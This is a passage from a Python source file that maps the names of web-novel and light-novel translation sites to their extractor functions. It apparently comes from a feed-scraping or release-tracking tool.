pfuncs_h_n.extractLygarTranslations,\n\t\t\t\t'Lylis Translations' : pfuncs_h_n.extractLylisTranslations,\n\t\t\t\t'Lynfamily' : pfuncs_h_n.extractLynfamily,\n\t\t\t\t'Lypheon Machine Translation' : pfuncs_h_n.extractLypheonMachineTranslation,\n\t\t\t\t'Machine Sliced Bread' : pfuncs_h_n.extractMachineSlicedBread,\n\t\t\t\t'Madao Translations' : pfuncs_h_n.extractMadaoTranslations,\n\t\t\t\t'MadoSpicy TL' : pfuncs_h_n.extractMadoSpicy,\n\t\t\t\t'Mahou Koukoku' : pfuncs_h_n.extractMahouKoukoku,\n\t\t\t\t'Mahoutsuki Translation' : pfuncs_h_n.extractMahoutsuki,\n\t\t\t\t'Makina Translations' : pfuncs_h_n.extractMakinaTranslations,\n\t\t\t\t'Mana Tank Magus' : pfuncs_h_n.extractManaTankMagus,\n\t\t\t\t'Manga0205 Translations' : pfuncs_h_n.extractManga0205Translations,\n\t\t\t\t'Maou na Anoko to murabito a' : pfuncs_h_n.extractMaounaAnokotomurabitoa,\n\t\t\t\t'VaanCruze' : pfuncs_h_n.extractMaouTheYuusha,\n\t\t\t\t'Martial God Translator' : pfuncs_h_n.extractMartialGodTranslator,\n\t\t\t\t'Mecha Mushroom Translations' : pfuncs_h_n.extractMechaMushroom,\n\t\t\t\t'Yet Another Translation Site' : pfuncs_h_n.extractMiaomix539,\n\t\t\t\t'Midnight Translation Blog' : pfuncs_h_n.extractMidnightTranslationBlog,\n\t\t\t\t'Mike777ac' : pfuncs_h_n.extractMike777ac,\n\t\t\t\t'Mnemeaa' : pfuncs_h_n.extractMnemeaa,\n\t\t\t\t'Mojo Translations' : pfuncs_h_n.extractMojoTranslations,\n\t\t\t\t\"Monkoto's Translations\" : pfuncs_h_n.extractMonkotosTranslations,\n\t\t\t\t'Monk Translation' : pfuncs_h_n.extractMonkTranslation,\n\t\t\t\t'Moon Bunny Cafe' : pfuncs_h_n.extractMoonBunnyCafe,\n\t\t\t\t'Morrighan Sucks' : pfuncs_h_n.extractMorrighanSucks,\n\t\t\t\t'Mousou Haven' : pfuncs_h_n.extractMousouHaven,\n\t\t\t\t'mousou-haven.com' : pfuncs_h_n.extractMousouhaven,\n\t\t\t\t'MTLCrap' : pfuncs_h_n.extractMTLCrap,\n\t\t\t\t'My Purple World' : pfuncs_h_n.extractMyPurpleWorld,\n\t\t\t\t'Mystique Translations' : pfuncs_h_n.extractMystiqueTranslations,\n\t\t\t\t'Mythical Pagoda' : pfuncs_h_n.extractMythicalPagoda,\n\t\t\t\t'N00b Translations' : 
pfuncs_h_n.extractN00bTranslations,\n\t\t\t\t'Nakimushi' : pfuncs_h_n.extractNakimushi,\n\t\t\t\t'[nakulas]' : pfuncs_h_n.extractNakulas,\n\t\t\t\t'Nanjamora' : pfuncs_h_n.extractNanjamora,\n\t\t\t\t'(NanoDesu) - Amagi Brilliant Park ' : pfuncs_h_n.extractNanoDesuAmagiBrilliantPark,\n\t\t\t\t'(NanoDesu) - Fate/Apocrypha' : pfuncs_h_n.extractNanoDesuFateApocrypha,\n\t\t\t\t'(NanoDesu) - Fuyuu Gakuen no Alice and Shirley' : pfuncs_h_n.extractNanoDesuFuyuuGakuennoAliceandShirley,\n\t\t\t\t'(NanoDesu) - Gekka no Utahime to Magi no Ou' : pfuncs_h_n.extractNanoDesuGekkanoUtahimetoMaginoOu,\n\t\t\t\t'(NanoDesu) - GJ-Bu' : pfuncs_h_n.extractNanoDesuGJBu,\n\t\t\t\t'(NanoDesu) - Hai to Gensou no Grimgal' : pfuncs_h_n.extractNanoDesuHaitoGensounoGrimgal,\n\t\t\t\t'(NanoDesu) - Hentai Ouji to Warawanai Neko' : pfuncs_h_n.extractNanoDesuHentaiOujitoWarawanaiNeko,\n\t\t\t\t'(NanoDesu) - Kono Sekai ga Game Dato Ore Dake ga Shitteiru' : pfuncs_h_n.extractNanoDesuKonoSekaigaGameDatoOreDakegaShitteiru,\n\t\t\t\t'(NanoDesu) - Kore wa Zombie Desu ka?' : pfuncs_h_n.extractNanoDesuKorewaZombieDesuka,\n\t\t\t\t'(NanoDesu) - Kurenai' : pfuncs_h_n.extractNanoDesuKurenai,\n\t\t\t\t'NanoDesu Light Novel Translations' : pfuncs_h_n.extractNanoDesuLightNovelTranslations,\n\t\t\t\t'(NanoDesu) - Love★You' : pfuncs_h_n.extractNanoDesuLoveYou,\n\t\t\t\t'(NanoDesu) - Maoyuu Maou Yuusha' : pfuncs_h_n.extractNanoDesuMaoyuuMaouYuusha,\n\t\t\t\t'(NanoDesu) - Mayo Chiki' : pfuncs_h_n.extractNanoDesuMayoChiki,\n\t\t\t\t'(NanoDesu) - Ojamajo Doremi' : pfuncs_h_n.extractNanoDesuOjamajoDoremi,\n\t\t\t\t'(NanoDesu) - Oreimo' : pfuncs_h_n.extractNanoDesuOreimo,\n\t\t\t\t'(NanoDesu) - Rokka no Yuusha' : pfuncs_h_n.extractNanoDesuRokkanoYuusha,\n\t\t\t\t'(NanoDesu) - Saenai Heroine no Sodatekata' : pfuncs_h_n.extractNanoDesuSaenaiHeroinenoSodatekata,\n\t\t\t\t'(NanoDesu) - Sasami-San@Ganbaranai' : pfuncs_h_n.extractNanoDesuSasamiSanGanbaranai,\n\t\t\t\t'(NanoDesu) - Seitokai no Ichizon' : pfuncs_h_n.extractNanoDesuSeitokainoIchizon,\n\t\t\t\t'(NanoDesu) - Sky World' : pfuncs_h_n.extractNanoDesuSkyWorld,\n\t\t\t\t'(NanoDesu) - Yahari Ore no Seishun Love Come wa Machigatteiru' : pfuncs_h_n.extractNanoDesuYahariOrenoSeishunLoveComewaMachigatteiru,\n\t\t\t\t'Nanowave Translations' : pfuncs_h_n.extractNanowaveTranslations,\n\t\t\t\t'National NEET' : pfuncs_h_n.extractNationalNEET,\n\t\t\t\t'Natsu TL' : pfuncs_h_n.extractNatsuTl,\n\t\t\t\t'Lazy NEET Translations' : pfuncs_h_n.extractNEET,\n\t\t\t\t'NEET Translations' : pfuncs_h_n.extractNeetTranslations,\n\t\t\t\t'Nega Translations' : pfuncs_h_n.extractNegaTranslations,\n\t\t\t\t'Nekoyashiki' : pfuncs_h_n.extractNekoyashiki,\n\t\t\t\t'Neo Translations' : pfuncs_h_n.extractNeoTranslations,\n\t\t\t\t'Nepustation' : pfuncs_h_n.extractNepustation,\n\t\t\t\t'Nightbreeze Translations' : pfuncs_h_n.extractNightbreeze,\n\t\t\t\t'NightFall Translations' : pfuncs_h_n.extractNightFallTranslations,\n\t\t\t\t'NinjaNUF' : pfuncs_h_n.extractNinjaNUF,\n\t\t\t\t'Nohohon Translation' : pfuncs_h_n.extractNohohon,\n\t\t\t\t'Nooblate' : pfuncs_h_n.extractNooblate,\n\t\t\t\t'Noodletown Translated' : pfuncs_h_n.extractNoodletownTranslated,\n\t\t\t\t'NOT Daily Translations' : pfuncs_h_n.extractNotDailyTranslations,\n\t\t\t\t'NovelCow' : pfuncs_h_n.extractNovelCow,\n\t\t\t\t'Novelisation' : pfuncs_h_n.extractNovelisation,\n\t\t\t\t'Novel Saga' : pfuncs_h_n.extractNovelSaga,\n\t\t\t\t'Novels Ground' : pfuncs_h_n.extractNovelsGround,\n\t\t\t\t'Novels Japan' : pfuncs_h_n.extractNovelsJapan,\n\t\t\t\t'Novels Nao' : 
pfuncs_h_n.extractNovelsNao,\n\t\t\t\t'Novel Trans' : pfuncs_h_n.extractNovelTrans,\n\t\t\t\t'NoviceTranslator' : pfuncs_h_n.extractNoviceTranslator,\n\t\t\t\t'Nowhere & Nothing' : pfuncs_h_n.extractNowhereNothing,\n\t\t\t\t'NTRHolic' : pfuncs_h_n.extractNTRHolic,\n\t\t\t\t'Nutty is Procrastinating' : pfuncs_h_n.extractNutty,\n\t\t\t\t'Ohanashimi' : pfuncs_o_u.extractOhanashimi,\n\t\t\t\t'OK Translation' : pfuncs_o_u.extractOKTranslation,\n\t\t\t\t'Omega Harem' : pfuncs_o_u.extractOmegaHarem,\n\t\t\t\t'Omgitsaray Translations' : pfuncs_o_u.extractOmgitsaray,\n\t\t\t\t'One Man Army Translations (OMA)' : pfuncs_o_u.extractOneManArmy,\n\t\t\t\t'One Man Army Translations' : pfuncs_o_u.extractOneManArmy,\n\t\t\t\t'One Second Spring' : pfuncs_o_u.extractOneSecondSpring,\n\t\t\t\t'お兄ちゃん、やめてぇ!' : pfuncs_o_u.extractOniichanyamete,\n\t\t\t\t'Opinisaya.com' : pfuncs_o_u.extractOpinisaya,\n\t\t\t\t'Ore ga Heroine in English' : pfuncs_o_u.extractOregaHeroineinEnglish,\n\t\t\t\t'Origin Novels' : pfuncs_o_u.extractOriginNovels,\n\t\t\t\t'Otome Revolution' : pfuncs_o_u.extractOtomeRevolution,\n\t\t\t\t'Otterspace Translation' : pfuncs_o_u.extractOtterspaceTranslation,\n\t\t\t\t'otterspacetranslation' : pfuncs_o_u.extractOtterspaceTranslation,\n\t\t\t\t'Outspan Foster' : pfuncs_o_u.extractOutspanFoster,\n\t\t\t\t'Oyasumi Reads' : pfuncs_o_u.extractOyasumiReads,\n\t\t\t\t'Pact Web Serial' : pfuncs_o_u.extractPactWebSerial,\n\t\t\t\t'pandafuqtranslations' : pfuncs_o_u.extractPandafuqTranslations,\n\t\t\t\t\"Pandora's Book\" : pfuncs_o_u.extractPandorasBook,\n\t\t\t\t'Patriarch Reliance' : pfuncs_o_u.extractPatriarchReliance,\n\t\t\t\t'Paztok' : pfuncs_o_u.extractPaztok,\n\t\t\t\t'Pea\\'s Kingdom' : pfuncs_o_u.extractPeasKingdom,\n\t\t\t\t'Pea Translation' : pfuncs_o_u.extractPeaTranslation,\n\t\t\t\t'Pekabo Blog' : pfuncs_o_u.extractPekaboBlog,\n\t\t\t\t'Penguin Overlord Translations' : pfuncs_o_u.extractPenguinOverlordTranslations,\n\t\t\t\t'Pettanko Translations' : pfuncs_o_u.extractPettankoTranslations,\n\t\t\t\t'Pielord Translations' : pfuncs_o_u.extractPielordTranslations,\n\t\t\t\t'PiggyBottle Translations' : pfuncs_o_u.extractPiggyBottleTranslations,\n\t\t\t\t'Pika Translations' : pfuncs_o_u.extractPikaTranslations,\n\t\t\t\t'Pippi Site' : pfuncs_o_u.extractPippiSite,\n\t\t\t\t'A Place Of Legends' : pfuncs_o_u.extractPlaceOfLegends,\n\t\t\t\t'PlainlyBored' : pfuncs_o_u.extractPlainlyBored,\n\t\t\t\t'Polyphonic Story Translation Group' : pfuncs_o_u.extractPolyphonicStoryTranslationGroup,\n\t\t\t\t'Popsiclete' : pfuncs_o_u.extractPopsiclete,\n\t\t\t\t'Premium Red Tea' : pfuncs_o_u.extractPremiumRedTea,\n\t\t\t\t'Priddles Translations' : pfuncs_o_u.extractPriddlesTranslations,\n\t\t\t\t'www.pridesfamiliarsmaidens.com' : pfuncs_o_u.extractPridesFamiliarsMaidens,\n\t\t\t\t'Pride X ReVamp' : pfuncs_o_u.extractPrideXReVamp,\n\t\t\t\t'Prince Revolution!' 
: pfuncs_o_u.extractPrinceRevolution,\n\t\t\t\t'ProcrasTranslation' : pfuncs_o_u.extractProcrasTranslation,\n\t\t\t\t'Project Accelerator' : pfuncs_o_u.extractProjectAccelerator,\n\t\t\t\t'Psicern.Translations' : pfuncs_o_u.extractPsicernTranslations,\n\t\t\t\t'Pumpkin Translations' : pfuncs_o_u.extractPumpkinTranslations,\n\t\t\t\t'putttytranslations' : pfuncs_o_u.extractPuttty,\n\t\t\t\t'Qualidea of Scum and a Gold Coin' : pfuncs_o_u.extractQualideaofScumandaGoldCoin,\n\t\t\t\t'QualiTeaTranslations' : pfuncs_o_u.extractQualiTeaTranslations,\n\t\t\t\t'Quality ★ Mistranslations' : pfuncs_o_u.extractQualityMistranslations,\n\t\t\t\t'Radiant Translations' : pfuncs_o_u.extractRadiantTranslations,\n\t\t\t\t'Rainbow Translations' : pfuncs_o_u.extractRainbowTranslations,\n\t\t\t\t'Raising Angels & Defection' : pfuncs_o_u.extractRaisingAngelsDefection,\n\t\t\t\t'Raising the Dead' : pfuncs_o_u.extractRaisingTheDead,\n\t\t\t\t'RANCER' : pfuncs_o_u.extractRancer,\n\t\t\t\t'Rancer' : pfuncs_o_u.extractRancer,\n\t\t\t\t'Read Me Translations' : pfuncs_o_u.extractReadMeTranslations,\n\t\t\t\t'Realm of Chaos' : pfuncs_o_u.extractRealmOfChaos,\n\t\t\t\t'ℝeanとann@' : pfuncs_o_u.extractReantoAnna,\n\t\t\t\t'Rebirth Online World' : pfuncs_o_u.extractRebirthOnlineWorld,\n\t\t\t\t'Rebirth Online' : pfuncs_o_u.extractRebirthOnlineWorld,\n\t\t\t\t'Red Dragon Translations' : pfuncs_o_u.extractRedDragonTranslations,\n\t\t\t\t'Reddy Creations' : pfuncs_o_u.extractReddyCreations,\n\t\t\t\t'Red Lantern Archives' : pfuncs_o_u.extractRedLanternArchives,\n\t\t\t\t'Rei TransBlog' : pfuncs_o_u.extractReiTransBlog,\n\t\t\t\t'Reject Hero' : pfuncs_o_u.extractRejectHero,\n\t\t\t\t'Rhinabolla' : pfuncs_o_u.extractRhinabolla,\n\t\t\t\t'RidwanTrans' : pfuncs_o_u.extractRidwanTrans,\n\t\t\t\t'RinOtakuBlog' : pfuncs_o_u.extractRinOtakuBlog,\n\t\t\t\t'Rip translations' : pfuncs_o_u.extractRiptranslations,\n\t\t\t\t'Rising Dragons Translation' : pfuncs_o_u.extractRisingDragons,\n\t\t\t\t'Roasted Tea' : pfuncs_o_u.extractRoastedTea,\n\t\t\t\t'Romantic Dreamer\\'s Sanctuary' : pfuncs_o_u.extractRomanticDreamersSanctuary,\n\t\t\t\t'Root of Evil' : pfuncs_o_u.extractRootOfEvil,\n\t\t\t\t'Rosyfantasy - Always Dreaming' : pfuncs_o_u.extractRosyFantasy,\n\t\t\t\t'Rosy Fantasy' : pfuncs_o_u.extractRosyFantasy,\n\t\t\t\t'Roxism HQ' : pfuncs_o_u.extractRoxism,\n\t\t\t\t\"Rui's Translations\" : pfuncs_o_u.extractRuisTranslations,\n\t\t\t\t'Rumanshi\\'s Lair' : pfuncs_o_u.extractRumanshisLair,\n\t\t\t\t'Rumor\\'s Block' : pfuncs_o_u.extractRumorsBlock,\n\t\t\t\t'Ruze Translations' : pfuncs_o_u.extractRuzeTranslations,\n\t\t\t\t'Saber Translations' : pfuncs_o_u.extractSaberTranslations,\n\t\t\t\t'Saiaku Translations Blog' : pfuncs_o_u.extractSaiakuTranslationsBlog,\n\t\t\t\t'桜翻訳! 
| Light novel translations' : pfuncs_o_u.extractSakurahonyaku,\n\t\t\t\t'Sandwich Kingdom' : pfuncs_o_u.extractSandwichKingdom,\n\t\t\t\t'Sauri\\'s TL Blog' : pfuncs_o_u.extractSaurisTLBlog,\n\t\t\t\t'Scrya Translations' : pfuncs_o_u.extractScryaTranslations,\n\t\t\t\t'SenjiQ creations' : pfuncs_o_u.extractSenjiQcreations,\n\t\t\t\t'SETSUNA86BLOG' : pfuncs_o_u.extractSETSUNA86BLOG,\n\t\t\t\t'Shell2ly C-Novel Site' : pfuncs_o_u.extractShell2lyCNovelSite,\n\t\t\t\t'Sherma Translations' : pfuncs_o_u.extractShermaTranslations,\n\t\t\t\t'Shikkaku Translations' : pfuncs_o_u.extractShikkakuTranslations,\n\t\t\t\t'Shin Sekai Yori – From the New World' : pfuncs_o_u.extractShinSekaiYori,\n\t\t\t\t'Shinsori Translations' : pfuncs_o_u.extractShinsori,\n\t\t\t\t'Shin Translations' : pfuncs_o_u.extractShinTranslations,\n\t\t\t\t'Shiroyukineko Translations' : pfuncs_o_u.extractShiroyukineko,\n\t\t\t\t'Shokyuu Translations' : pfuncs_o_u.extractShokyuuTranslations,\n\t\t\t\t'Silent Tl' : pfuncs_o_u.extractSilentTl,\n\t\t\t\t'Silva\\'s Library' : pfuncs_o_u.extractSilvasLibrary,\n\t\t\t\t'Silver Butterfly' : pfuncs_o_u.extractSilverButterfly,\n\t\t\t\t'Sins of the Fathers' : pfuncs_o_u.extractSinsOfTheFathers,\n\t\t\t\t'Skull Squadron' : pfuncs_o_u.extractSkullSquadron,\n\t\t\t\t'Skythewood translations' : pfuncs_o_u.extractSkythewood,\n\t\t\t\t'Sleepy Translations' : pfuncs_o_u.extractSleepyTranslations,\n\t\t\t\t'Slime Lv1' : pfuncs_o_u.extractSlimeLv1,\n\t\t\t\t'-Sloth-' : pfuncs_o_u.extractSloth,\n\t\t\t\t'Sloth Translations Blog' : pfuncs_o_u.extractSlothTranslationsBlog,\n\t\t\t\t'Snow & Dust' : pfuncs_o_u.extractSnowDust,\n\t\t\t\t'Snow Translations' : pfuncs_o_u.extractSnowTranslations,\n\t\t\t\t'Snowy Publications' : pfuncs_o_u.extractSnowyPublications,\n\t\t\t\t'Soaring Translations' : pfuncs_o_u.extractSoaring,\n\t\t\t\t'Solitary Translation' : pfuncs_o_u.extractSolitaryTranslation,\n\t\t\t\t'Solstar24' : pfuncs_o_u.extractSolstar24,\n\t\t\t\t'www.soltarination.org' : pfuncs_o_u.extractSoltarination,\n\t\t\t\t'Soltarination Scanlations' : pfuncs_o_u.extractSoltarinationScanlations,\n\t\t\t\t'Soojiki\\'s Project' : pfuncs_o_u.extractSoojikisProject,\n\t\t\t\t'Sora Translations' : pfuncs_o_u.extractSoraTranslations,\n\t\t\t\t'Sora Translationsblog' : pfuncs_o_u.extractSoraTranslations,\n\t\t\t\t'Supreme Origin Translations' : pfuncs_o_u.extractSotranslations,\n\t\t\t\t'Sousetsuka' : pfuncs_o_u.extractSousetsuka,\n\t\t\t\t'Spirit God Shura' : pfuncs_o_u.extractSpiritGodShura,\n\t\t\t\t'Spiritual Transcription' : pfuncs_o_u.extractSpiritualTranscription,\n\t\t\t\t'Spring Scents' : pfuncs_o_u.extractSpringScents,\n\t\t\t\t'Starrydawn Translations' : pfuncs_o_u.extractStarrydawnTranslations,\n\t\t\t\t'Stellar Transformation Con.' 
: pfuncs_o_u.extractStellarTransformationCon,\n\t\t\t\t'STL Translations' : pfuncs_o_u.extractSTLTranslations,\n\t\t\t\t'Stone Burners' : pfuncs_o_u.extractStoneBurners,\n\t\t\t\t'Subudai11' : pfuncs_o_u.extractSubudai11,\n\t\t\t\t'Sun Shower Fields' : pfuncs_o_u.extractSunShowerFields,\n\t\t\t\t'Super Potato Translations' : pfuncs_o_u.extractSuperPotatoTranslations,\n\t\t\t\t'Suteki Da Ne' : pfuncs_o_u.extractSutekiDaNe,\n\t\t\t\t'Sweet A Collections' : pfuncs_o_u.extractSweetACollections,\n\t\t\t\t'Sword and Game' : pfuncs_o_u.extractSwordAndGame,\n\t\t\t\t'Sylver Translations' : pfuncs_o_u.extractSylver,\n\t\t\t\t'Symbiote' : pfuncs_o_u.extractSymbiote,\n\t\t\t\t'~Taffy Translations~' : pfuncs_o_u.extractTaffyTranslations,\n\t\t\t\t'Taida-dono Translations' : pfuncs_o_u.extractTaidadonoTranslations,\n\t\t\t\t'Taint' : pfuncs_o_u.extractTaint,\n\t\t\t\t'Tales of MU' : pfuncs_o_u.extractTalesOfMU,\n\t\t\t\t'The Tales of Paul Twister' : pfuncs_o_u.extractTalesOfPaulTwister,\n\t\t\t\t'Tales of The Forgottenslayer' : pfuncs_o_u.extractTalesofTheForgottenslayer,\n\t\t\t\t'tap-trans » tappity tappity tap.' : pfuncs_o_u.extractTaptrans,\n\t\t\t\t'Tarable Translations' : pfuncs_o_u.extractTarableTranslations,\n\t\t\t\t'Tatakau Shisho Light Novel Translation' : pfuncs_o_u.extractTatakauShishoLightNovelTranslation,\n\t\t\t\t'Tensai Translations' : pfuncs_o_u.extractTensaiTranslations,\n\t\t\t\t'Tentatively under construction' : pfuncs_o_u.extractTentativelyUnderconstruction,\n\t\t\t\t'Ten Thousand Heaven Controlling Sword' : pfuncs_o_u.extractTenThousandHeavenControllingSword,\n\t\t\t\t'Terminus Translation' : pfuncs_o_u.extractTerminusTranslation,\n\t\t\t\t'ThatGuyOverThere' : pfuncs_o_u.extractThatGuyOverThere,\n\t\t\t\t'The Asian Cult' : pfuncs_o_u.extractTheAsianCult,\n\t\t\t\t'The Beginning After The End Novel' : pfuncs_o_u.extractTheBeginningAfterTheEnd,\n\t\t\t\t'TheDefend Translations' : pfuncs_o_u.extractTheDefendTranslations,\n\t\t\t\t'The Iron Teeth' : pfuncs_o_u.extractTheIronTeeth,\n\t\t\t\t'The Last Skull' : pfuncs_o_u.extractTheLastSkull,\n\t\t\t\t'TheLazy9' : pfuncs_o_u.extractTheLazy9,\n\t\t\t\t'The Mustang Translator' : pfuncs_o_u.extractTheMustangTranslator,\n\t\t\t\t'The Named' : pfuncs_o_u.extractTheNamed,\n\t\t\t\t'The Sphere' : pfuncs_o_u.extractTheSphere,\n\t\t\t\t'The Undying Cultivator' : pfuncs_o_u.extractTheUndyingCultivator,\n\t\t\t\t'This World Work' : pfuncs_o_u.extractThisWorldWork,\n\t\t\t\t'Thunder Translation' : pfuncs_o_u.extractThunder,\n\t\t\t\t'Thyaeria Translations' : pfuncs_o_u.extractThyaeria,\n\t\t\t\t'Tieshaunn' : pfuncs_o_u.extractTieshaunn,\n\t\t\t\t'Tinkerbell-san' : pfuncs_o_u.extractTinkerbellsan,\n\t\t\t\t'TL Syosetsu' : pfuncs_o_u.extractTLSyosetsu,\n\t\t\t\t'Tofubyu' : pfuncs_o_u.extractTofubyu,\n\t\t\t\t'Tomorolls' : pfuncs_o_u.extractTomorolls,\n\t\t\t\t'Tony Yon Ka' : pfuncs_o_u.extractTonyYonKa,\n\t\t\t\t'Totally Insane Tranlation' : pfuncs_o_u.extractTotallyInsaneTranslation,\n\t\t\t\t'Totally Insane Translation' : pfuncs_o_u.extractTotallyInsaneTranslation,\n\t\t\t\t'Totokk\\'s Translations' : pfuncs_o_u.extractTotokk,\n\t\t\t\t'Towards the Sky~' : pfuncs_o_u.extractTowardsTheSky,\n\t\t\t\t'Translating For Your Pleasure' : pfuncs_o_u.extractTranslatingForYourPleasure,\n\t\t\t\t'Translating Ze Tian Ji' : pfuncs_o_u.extractTranslatingZeTianJi,\n\t\t\t\t'Translation Nations' : pfuncs_o_u.extractTranslationNations,\n\t\t\t\t'Translation Raven' : pfuncs_o_u.extractTranslationRaven,\n\t\t\t\t'Translations From Outer Space' : 
pfuncs_o_u.extractTranslationsFromOuterSpace,\n\t\t\t\t'Translation Treasure Box' : pfuncs_o_u.extractTranslationTreasureBox,\n\t\t\t\t'Trinity Archive' : pfuncs_o_u.extractTrinityArchive,\n\t\t\t\t'Tripp Translations' : pfuncs_o_u.extractTrippTl,\n\t\t\t\t'Trung Nguyen' : pfuncs_o_u.extractTrungNguyen,\n\t\t\t\t'Trungt Nguyen 123' : pfuncs_o_u.extractTrungtNguyen,\n\t\t\t\t'Try Translations' : pfuncs_o_u.extractTryTranslations,\n\t\t\t\t'Tseirp Translations' : pfuncs_o_u.extractTseirpTranslations,\n\t\t\t\t'Tsuigeki Translations' : pfuncs_o_u.extractTsuigeki,\n\t\t\t\t'Tsukigomori' : pfuncs_o_u.extractTsukigomori,\n\t\t\t\t'Tumble Into Fantasy' : pfuncs_o_u.extractTumbleIntoFantasy,\n\t\t\t\t'Turb0 Translation' : pfuncs_o_u.extractTurb0,\n\t\t\t\t'Turtle and Hare Translations' : pfuncs_o_u.extractTurtleandHareTranslations,\n\t\t\t\t'中翻英圖書館 Translations' : pfuncs_o_u.extractTuShuGuan,\n\t\t\t\t'Tus-Trans' : pfuncs_o_u.extractTusTrans,\n\t\t\t\t'Twelve Months of May' : pfuncs_o_u.extractTwelveMonthsofMay,\n\t\t\t\t'Twig' : pfuncs_o_u.extractTwig,\n\t\t\t\t'Twisted Cogs' : pfuncs_o_u.extractTwistedCogs,\n\t\t\t\t'Tyrant\\'s Eye Translations' : pfuncs_o_u.extractTyrantsEyeTranslations,\n\t\t\t\t'「\\u3000」' : pfuncs_o_u.extractU3000,\n\t\t\t\t'U Donate We Translate' : pfuncs_o_u.extractUDonateWeTranslate,\n\t\t\t\t'Ukel2x' : pfuncs_o_u.extractUkel2x,\n\t\t\t\t'Ultimate Arcane' : pfuncs_o_u.extractUltimateArcane,\n\t\t\t\t'Unchained Translation' : pfuncs_o_u.extractUnchainedTranslation,\n\t\t\t\t'Undecent Translations' : pfuncs_o_u.extractUndecentTranslations,\n\t\t\t\t'Universes With Meaning' : pfuncs_o_u.extractUniversesWithMeaning,\n\t\t\t\t'Unlimited Novel Failures' : pfuncs_o_u.extractUnlimitedNovelFailures,\n\t\t\t\t'Unlimited Story Works' : pfuncs_o_u.extractUnlimitedStoryWorks,\n\t\t\t\t'unnamedtranslations.blogspot.com' : pfuncs_o_u.extractUnnamedtranslations,\n\t\t\t\t'Untuned Translation Blog' : pfuncs_o_u.extractUntunedTranslation,\n\t\t\t\t'Useless no 4' : pfuncs_o_u.extractUselessno4,\n\t\t\t\t'v7 Silent' : pfuncs_v_other.extractV7Silent,\n\t\t\t\t'Verathragana Stories' : pfuncs_v_other.extractVerathragana,\n\t\t\t\t'Village Translations' : pfuncs_v_other.extractVillageTranslations,\n\t\t\t\t'Void Translations' : pfuncs_v_other.extractVoidTranslations,\n\t\t\t\t'Volare Translations' : pfuncs_v_other.extractVolareTranslations,\n\t\t\t\t'Walking the Storm' : pfuncs_v_other.extractWalkingTheStorm,\n\t\t\t\t'Walk the Jiang Hu' : pfuncs_v_other.extractWalkTheJiangHu,\n\t\t\t\t'Wat Da Meow' : pfuncs_v_other.extractWatDaMeow,\n\t\t\t\t'Watermelon Helmets' : pfuncs_v_other.extractWatermelonHelmets,\n\t\t\t\t'World of Watermelons' : pfuncs_v_other.extractWatermelons,\n\t\t\t\t'WCC Translation' : pfuncs_v_other.extractWCCTranslation,\n\t\t\t\t'Weaving stories and building castles in the clouds' : pfuncs_v_other.extractWeavingstoriesandbuildingcastlesintheclouds,\n\t\t\t\t'Web Novel Japanese Translation' : pfuncs_v_other.extractWebNovelJapaneseTranslation,\n\t\t\t\t'Welcome To The Underdark' : pfuncs_v_other.extractWelcomeToTheUnderdark,\n\t\t\t\t'Wele Translation' : pfuncs_v_other.extractWeleTranslation,\n\t\t\t\t'When The Hunting Party Came' : pfuncs_v_other.extractWhenTheHuntingPartyCame,\n\t\t\t\t'Whimsical Land' : pfuncs_v_other.extractWhimsicalLand,\n\t\t\t\t'White Night Site' : pfuncs_v_other.extractWhiteNightSite,\n\t\t\t\t'White Tiger Translations' : pfuncs_v_other.extractWhiteTigerTranslations,\n\t\t\t\t'Willful Casual' : pfuncs_v_other.extractWillfulCasual,\n\t\t\t\t'Witch Life 
Novel' : pfuncs_v_other.extractWitchLife,\n\t\t\t\t\"WizThief's Novels\" : pfuncs_v_other.extractWizThiefsNovels,\n\t\t\t\t'WL Translations' : pfuncs_v_other.extractWLTranslations,\n\t\t\t\t'Wolfie Translation' : pfuncs_v_other.extractWolfieTranslation,\n\t\t\t\t'Word of Craft' : pfuncs_v_other.extractWordofCraft,\n\t\t\t\t'World of Summie' : pfuncs_v_other.extractWorldofSummie,\n\t\t\t\t'Worm - A Complete Web Serial' : pfuncs_v_other.extractWormACompleteWebSerial,\n\t\t\t\t'Wuxia Heroes' : pfuncs_v_other.extractWuxiaHeroes,\n\t\t\t\t'WuxiaSociety' : pfuncs_v_other.extractWuxiaSociety,\n\t\t\t\t'Wuxia Translations' : pfuncs_v_other.extractWuxiaTranslations,\n\t\t\t\t'Wuxia Translators' : pfuncs_v_other.extractWuxiaTranslators,\n\t\t\t\t'Wuxiaworld' : pfuncs_v_other.extractWuxiaworld,\n\t\t\t\t'Wuxiwish' : pfuncs_v_other.extractWuxiwish,\n\t\t\t\t'Xant & Minions' : pfuncs_v_other.extractXantAndMinions,\n\t\t\t\t'xantbos.wordpress.com' : pfuncs_v_other.extractXantbos,\n\t\t\t\t'Xant Does Stuff and Things' : pfuncs_v_other.extractXantDoesStuffAndThings,\n\t\t\t\t'XCrossJ' : pfuncs_v_other.extractXCrossJ,\n\t\t\t\t\"Xiaowen206's Blog\" : pfuncs_v_other.extractXiaowen206sBlog,\n\t\t\t\t'Yi Yue Translation' : pfuncs_v_other.extractYiYueTranslation,\n\t\t\t\t'Yoraikun Translation' : pfuncs_v_other.extractYoraikun,\n\t\t\t\t'Youjinsite Translations' : pfuncs_v_other.extractYoujinsite,\n\t\t\t\t'Youko Advent' : pfuncs_v_other.extractYoukoAdvent,\n\t\t\t\t'Youshoku Translations' : pfuncs_v_other.extractYoushoku,\n\t\t\t\t'youtsubasilver\\'s Blog' : pfuncs_v_other.extractYoutsubasilversBlog,\n\t\t\t\t'Yukkuri Free Time Literature Service' : pfuncs_v_other.extractYukkuri,\n\t\t\t\t'Zen Translations' : pfuncs_v_other.extractZenTranslations,\n\t\t\t\t'Zeonic' : pfuncs_v_other.extractZeonic,\n\t\t\t\t'Ziru\\'s Musings | Translations~' : pfuncs_v_other.extractZiruTranslations,\n\t\t\t\t'The Zombie Knight' : pfuncs_v_other.extractZombieKnight,\n\t\t\t\t'ZSW' : pfuncs_v_other.extractZSW,\n\t\t\t\t\"Zxzxzx's blog\" : pfuncs_v_other.extractZxzxzxsBlog,\n\t\t\t\t'一期一会, 万歳!' 
